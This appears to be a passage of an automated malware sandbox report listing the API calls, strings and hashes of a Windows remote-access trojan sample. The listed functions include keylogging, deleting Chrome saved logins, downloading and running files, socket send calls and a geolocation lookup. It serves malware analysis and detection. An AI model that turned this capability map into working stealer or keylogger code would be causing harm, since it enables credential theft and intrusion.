                            Strings
                            • http://geoplugin.net/json.gp, xrefs: 004193A2
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleOpen$FileRead
                            • String ID: http://geoplugin.net/json.gp
                            • API String ID: 3121278467-91888290
                            • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                            • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                            • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                            • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                            • GetLastError.KERNEL32 ref: 0040A999
                            Strings
                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                            • UserProfile, xrefs: 0040A95F
                            • [Chrome StoredLogins not found], xrefs: 0040A9B3
                            • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • API String ID: 2018770650-1062637481
                            • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                            • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                            • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                            • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                            • GetLastError.KERNEL32 ref: 00415CDB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3534403312-3733053543
                            • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                            • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                            • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                            • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                            APIs
                            • __EH_prolog.LIBCMT ref: 00408393
                              • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                              • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                              • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                              • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                            • FindClose.KERNEL32(00000000), ref: 004086F4
                              • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                              • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                            • String ID:
                            • API String ID: 1824512719-0
                            • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                            • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                            • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                            • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                            APIs
                            • GetForegroundWindow.USER32 ref: 0040949C
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                            • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                            • GetKeyState.USER32(00000010), ref: 004094B8
                            • GetKeyboardState.USER32(?), ref: 004094C5
                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                            • String ID:
                            • API String ID: 3566172867-0
                            • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                            • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                            • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                            • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ManagerStart
                            • String ID:
                            • API String ID: 276877138-0
                            • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                            • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                            • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                            • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$CreateFirstNext
                            • String ID: H"G$`'G$`'G
                            • API String ID: 341183262-2774397156
                            • Opcode ID: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                            • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                            • Opcode Fuzzy Hash: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                            • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                            APIs
                              • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                              • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                              • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                              • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                              • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                            • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                            • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                            • String ID: PowrProf.dll$SetSuspendState
                            • API String ID: 1589313981-1420736420
                            • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                            • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                            • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                            • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                            APIs
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                            • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                            • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                            • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                            • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                            APIs
                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                            • wsprintfW.USER32 ref: 0040A13F
                              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventLocalTimewsprintf
                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                            • API String ID: 1497725170-248792730
                            • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                            • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                            • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                            • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                            APIs
                            • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                            • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                            • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                            • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SETTINGS
                            • API String ID: 3473537107-594951305
                            • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                            • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                            • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                            • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                            APIs
                            • __EH_prolog.LIBCMT ref: 004087A5
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstH_prologNext
                            • String ID:
                            • API String ID: 1157919129-0
                            • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                            • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                            • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                            • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                            • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                            • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                            • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                            • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                            • String ID:
                            • API String ID: 745075371-0
                            • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                            • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                            • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                            • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                            APIs
                            • __EH_prolog.LIBCMT ref: 0040784D
                            • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                            • String ID:
                            • API String ID: 1771804793-0
                            • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                            • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                            • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                            • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                            APIs
                              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                            • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                              • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                              • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                            • String ID:
                            • API String ID: 1735047541-0
                            • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                            • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                            • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                            • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: A%E$A%E
                            • API String ID: 0-137320553
                            • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                            • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                            • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                            • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                            APIs
                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                              • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                              • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                              • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateInfoParametersSystemValue
                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                            • API String ID: 4127273184-3576401099
                            • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                            • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                            • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                            • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                            • _wcschr.LIBVCRUNTIME ref: 0044F02A
                            • _wcschr.LIBVCRUNTIME ref: 0044F038
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                            • String ID:
                            • API String ID: 4212172061-0
                            • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                            • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                            • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                            • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadExecuteFileShell
                            • String ID: open
                            • API String ID: 2825088817-2758837156
                            • Opcode ID: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                            • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                            • Opcode Fuzzy Hash: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                            • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorInfoLastLocale$_free$_abort
                            • String ID:
                            • API String ID: 2829624132-0
                            • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                            • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                            • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                            • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 004399A4
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                            • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                            • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                            • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                            APIs
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                            Memory Dump Source
